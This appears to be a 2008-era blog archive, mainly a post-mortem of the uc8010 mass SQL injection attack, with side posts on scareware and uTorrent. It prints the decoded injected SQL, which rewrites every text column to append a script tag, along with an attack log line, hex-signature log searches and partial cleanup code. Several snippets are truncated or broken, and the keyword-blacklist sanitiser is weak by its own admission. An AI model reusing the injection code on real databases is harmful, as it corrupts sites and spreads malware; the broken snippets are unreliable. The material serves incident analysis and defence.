Microsoft issues advice on SQL injection attacks

Microsoft is alerting customers to several tools that could bolster Web application development in the wake of a rising number of SQL injection attacks targeting faulty code in websites.

This includes the uc8010 attack, which was launched around 28 December 2007 (see here and here for the lowdown on uc8010).

For the record, the attack is about poor programming (or lazy programming at any rate), and Microsoft are keen to point out that:

Is this a security vulnerability that requires Microsoft to issue a security update?
No. Any Web application code that has followed generally accepted best practices for security is significantly less susceptible to the SQL injection attack. Although this is not a security vulnerability, this advisory was issued to provide additional warning and assistance for administrators with vulnerable sites.

Microsoft Security Advisory (954462) Rise in SQL Injection Attacks Exploiting Unverified User Data Input

For those of you who have been recently hit by an SQL injection attack, here are some useful resources that I have found:

"What to do if you do not have a backed up copy of your database before the SQL injection attack" has code which *may* reverse the SQL injection attack.

This is the crucial piece of code which could save your bacon:

update ['+@T+'] set ['+@C+'] = left(
       convert(varchar(8000), ['+@C+']),
       len(convert(varchar(8000), ['+@C+'])) - 6 -
       patindex(''%tpircs<%'',
                reverse(convert(varchar(8000), ['+@C+']))))
     where ['+@C+'] like ''%<script%</script>''

More than likely you will have to modify it for your specific attack. Please check the article for full details.


Cannot login to

Am I the only person in the world that cannot login to

I know my username and password are okay, because under some circumstances I authenticate ok. Their forums don’t mention it.  So is it just me? If you have the same problem, please let me know.

(When I enter my login name and password and hit “come on in”, I get dumped to

Phah maybe it will be okay tomorrow. I’m using Firefox 3.0.1. They upgraded the site recently, but I can’t believe they broke the login??

uc8010 sql injection attack: the facts, more info and post mortem

I posted this when my website got hacked. Within hours, thanks to several clever guys, the whole thing was completely deconstructed with hard facts and code. Thanks to all those who contributed their information; it really helped me and many others out there.

This post is a summary of the comments spawned by my original post. If I forgot something important let me know.

Also check out:

How it was done

SQL injection via unescaped querystring variables.

We think they looked and tried several query string variables (like id, by, filter, etc)

Here is the code they injected (gotten from someone’s logfiles, and slightly tidied)

2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;
0350029002C00400043002000'. HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248

The actual SQL injected, once decoded, looks like this:

DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Cursor
CURSOR FOR select, from
 sysobjects a,
 syscolumns b
 and a.xtype='u'
 and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''''')
  CLOSE Table_Cursor

How to find out exactly how it happened to you

Try this in the command prompt on your logfiles:
find "0x4400450043" ex071228.log
find "0x4400450043" ex071229.log
find "0x4400450043" ex071230.log
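
The string those commands search for is the start of a hex-encoded NVARCHAR literal: 44 00 45 00 43 is "DEC" in UTF-16LE, the opening of DECLARE. As an added example (not code from the original post or its comments), this C# program pulls such hex blobs out of log lines and decodes them so you can read what was actually sent; the class name and the sample request line are constructed for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.Globalization;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;

static class HexBlobTriage
{
    // "0x" followed by at least 8 UTF-16 code units (32 hex digits).
    static readonly Regex Blob = new Regex("0x((?:[0-9A-Fa-f]{4}){8,})");

    // Decode every hex blob found on one log line as UTF-16LE text.
    public static List<string> DecodeLine(string logLine)
    {
        var decoded = new List<string>();
        foreach (Match m in Blob.Matches(logLine))
        {
            string hex = m.Groups[1].Value;
            var bytes = new byte[hex.Length / 2];
            for (int i = 0; i < bytes.Length; i++)
                bytes[i] = byte.Parse(hex.Substring(2 * i, 2), NumberStyles.HexNumber);
            decoded.Add(Encoding.Unicode.GetString(bytes));
        }
        return decoded;
    }

    static void Main(string[] args)
    {
        // Constructed sample: a harmless statement encoded the same way and
        // placed in a made-up request line (not a captured payload).
        string sql = "DECLARE @T varchar(255),@C varchar(255)";
        string hex = BitConverter.ToString(Encoding.Unicode.GetBytes(sql)).Replace("-", "");
        string sample = "2007-12-30 18:22:46 POST /page.asp id=1[...]0x" + hex + "[...] 500";

        // Pass a log file path (for example ex071230.log) to scan real logs instead.
        IEnumerable<string> lines = args.Length > 0 ? File.ReadLines(args[0]) : new[] { sample };
        foreach (string line in lines)
            foreach (string text in DecodeLine(line))
                Console.WriteLine(text);
    }
}
```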

How to fix

Make sure you escape your variables to protect against SQL injection.

In this case (MS SQL Server), you should do (something like) this:

string safer_id = Request.QueryString["id"].Replace("'","''");

By the looks of it ‘CAST(‘ and ‘EXEC(‘ look like good things to disallow too. More than likely you should restrict the length of the querystrings too, so something like the below can’t really hurt.

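// Cap the length first, so truncation cannot split a doubled quote.
string safer = Request.QueryString["id"] ?? "";
if (safer.Length > 128) safer = safer.Substring(0, 128);
// Double single quotes so the value cannot close a string literal.
safer = safer.Replace("'", "''");
// Neutralise the two keywords seen in the attack (case-sensitive match).
safer = safer.Replace("CAST(", "NOCAST](");
safer = safer.Replace("EXEC(", "NOEXEC](");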

These are not fool proof(*) and you should use STORED PROCEDURES in future (I know it is much more work!).
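
Why the blacklist is not fool proof, next to the hardened form: a numeric id needs no quote character to be abused, and String.Replace is case-sensitive. This is an added C# example, not code from the original post; the Articles table, its Title and Id columns and the class name are hypothetical, and it assumes System.Data.SqlClient is available. A stored procedure called with bound parameters gets the same protection.

```csharp
using System;
using System.Data;
using System.Data.SqlClient; // assumption: .NET Framework, or the SqlClient NuGet package

static class ArticleLookup
{
    // Copy of the post's blacklist, kept only to show what it lets through.
    public static string BlacklistFilter(string raw)
    {
        string safer = raw ?? "";
        if (safer.Length > 128) safer = safer.Substring(0, 128);
        safer = safer.Replace("'", "''");
        safer = safer.Replace("CAST(", "NOCAST](");
        return safer.Replace("EXEC(", "NOEXEC](");
    }

    // Hardened form: check the type, then bind the value as a parameter so it
    // is never parsed as SQL. Articles, Title and Id are hypothetical names.
    public static SqlCommand BuildLookup(SqlConnection conn, string rawId)
    {
        int id;
        if (!int.TryParse(rawId, out id) || id < 0)
            throw new ArgumentException("id must be a non-negative integer");

        var cmd = new SqlCommand("SELECT Title FROM Articles WHERE Id = @id", conn);
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
        return cmd;
    }

    static void Main()
    {
        // Constructed inputs: no quote characters, keywords in lower case.
        string[] samples = { "42", "42 or 1=1", "42;exec(@s)" };
        foreach (string s in samples)
        {
            Console.WriteLine("blacklist: {0} -> {1}", s, BlacklistFilter(s));
            try
            {
                SqlCommand cmd = BuildLookup(null, s); // no connection needed to build it
                Console.WriteLine("bound    : @id = {0}", cmd.Parameters["@id"].Value);
            }
            catch (ArgumentException e)
            {
                Console.WriteLine("rejected : {0}", e.Message);
            }
        }
    }
}
```

The second and third inputs come out of the blacklist unchanged, while the parameterised path rejects them before any SQL is built.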

What did it do?

Basically the code injected into your database found every varchar and text field and appended the string:

<script src=http://?></script>

The code for 0.js looks like:

// Sets a cookie that expires after Days*30 minutes.
function setCookie(name,value)
{
    var Days = 1;
    var exp = new Date();
    exp.setTime(exp.getTime() + Days*30*60*1000);
    document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
// Returns the value of the named cookie, or null if it is not set.
function getCookie(name)
{
    var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
    if(arr != null)
        return unescape(arr[2]);
    return null;
}

It is malicious: the point

According to websmithrob, this code is malicious, and hidden in there is an attack known as EXPL_REALPLAY.H, or the RealPlayer Exploit (read more about it here).

Microsoft issue security advisory

uc8010 is an SQL injection attack

02 January 2008
original post: a plea for help

I cannot find any information about this anywhere, but it happened to me and at least 76,800 others. Information is thin on the ground. If you know more please post it here.

As far as I can tell, the attack inserts <script src=http://?></script> into all varchar and text fields in your SQL database.

For lazy people like me, it is proving to be a nightmare! I have traditionally been very relaxed about this kind of business, I guess I must be more careful from now on.

07 January 2008
update on uc8010(dot)com

The exploit has been exposed and described (see the comments below; very, very informative, or go straight to the post-mortem). Below you can find out HOW they did it and WHAT it did. There is no magic fix, you will most likely have to restore your data from a backup, and to prevent further attacks you should escape all querystring variables coming into your database.
Thanks very much to the guys who posted their findings here! Much appreciated.

The attack *is* malicious, and the potential payload is described here (or this

Also watch out for ( which appears to be up to similar tricks.

When is a trojan not a trojan:

A non-technical friend of mine recently phoned me up to say he had been infected by a virus.  His home page was hi-jacked and he was pretty worried. The infection was proudly proclaimed to be by  According to several sources [of dubious accuracy]  this is very serious. is dangerous toolbar and comes from very dangerous trojan zlob. It hijack your homepage and displays fake warning message to download the another fake spyware applications… If your computer is infected by hijacker then it is very dangerous for your computer.


Note how many times they say dangerous. Note how poor the English is. Note how childishly they warn you of the impending doom. Ooooh this must be bad. I want my {mommy | blanket | cigarettes | pillow} (delete as appropriate)

What are the symptoms?

User’s homepage is changed to or to other unfamiliar websites. Warning messages such as “Virus Alert”, “Your Computer is Infected”, “Security Alert” Trojan-Spy.win32@mx or Spyware.Cyberlog-X infections are displayed.

You even get a warning that something has happened.

The art of deception: dead?

Well that’s all very interesting, but if I were seriously writing a trojan, would I shout so loudly that I had invaded your machine? (I saw Troy, and I don’t remember the Spartans (holding megaphones) riding the wooden horse into Troy, shouting YOUR DEFENSES HAVE BEEN BREACHED). In fact why bother with the wooden horse in the first place? Morons.

No. More likely this is what I think should be called “asshole-ware”. Why would someone announce that you were ill, could it be so that they could sell you medicine?

Your machine probably is infected, it may even be a real trojan, but the real catch is they get you to pay $25 to remove the infection. It’s a real real dumb idea, but it probably works.

A real trojan is about stealth, it doesn’t announce that it is dangerous.

It’s extremely funny, because they warn you of:

Very High Risk   –  Extremely dangerous Spyware. Uses stealth installation, randomly named entries and has the capability to self update or Restore after incomplete removal. Very hard to remove manually. Removing by free software or Re-Name the Dll file of cannot decrease the Privacy Risk, because it uses stealth installation method

I like anything which uses stealth and then warns me that it is using stealth. Is the art of deception truly dead? Was the Cold War all for nothing? Fuckwits.

We have a cure

You can use to clean your machine. It’s free. It’s safe. It’s well-known. This is a reputable product, and you can download it from A safe place to get stuff like this.

If you gonna lie, make it big


The key thing to note is that the answer is always the same: a specific recommendation of some no-brand spyware tool. Surprising that they never suggest McAfee or Symantec etc.

Appendix of delusion

This site is probably linked to the idiot mastermind of this scam: where they list their other scams.

 Latest Hijackers List  More lies:


Old Hijackers List Older lies:


utorrent 1.7.x banned or broken

I dunno what happened, but it seems to me that uTorrent 1.7.x is broken and is being banned by several trackers. There are several VERY long threads at

Even the wiki has an entry under the headline Major Bugs. For posterity it currently reads (I suspect this will get removed from the post very soon).

Major bugs
On July 21, 2007 µTorrent version 1.7.2 was released which fixed two bugs that had caused earlier 1.7 versions to be banned on a variety of trackers. The bugs in question could cause wrong stats to be reported both intentionally and unintentional. The first bug was solved in version 1.7.1 and the second in 1.7.2[16]. Although rumors spread that these µTorrent versions also reported personal info to a unknown destination (possibly the RIAA or MPAA) this has not been proven.

The solution is pretty obvious:

There is a bigger issue here, and it concerns the survival of P2P: will our own paranoia about the MPAA / RIAA force P2P out of use? Are they spreading the rumors? If they are, it is certainly the best weapon they have against P2P. If it’s just paranoia, well that’s pretty sad. uTorrent is one of the finest pieces of freeware ever, as essential as WinZip ever was. So let’s not ruin a good thing.

Why nothing you do will ever make a difference

Who was the Time “Person of the Year” in 2006? You’ll never believe it, no, you wouldn’t believe it if I told you, it was you (this is for real, not a “joke”).

How quaint? “You control the Information Age. Welcome to your world.” Who the fuck writes shit like this. Who the fuck believes it. Many do. Writing about holidays in the sun and polka dot bikinis.

No one cares about what you have to say.

You must have realised, after writing over 4,458 posts, and amassing 350 comments and 580,876 views, and 7.5 million page impressions, after building your pathetic “brand online“, you are #1 with a bullet in Technorati, you earn £0.53 a day from Google Adwords. What a success story you are.

You have a Page Rank of 4!

Well done, but guess what. Nothing you do ONLINE will ever make a difference. Turn it off, if you want to be noticed, go have a crap in the middle of the street, that works (you’d be about £0.53p a day worse off though).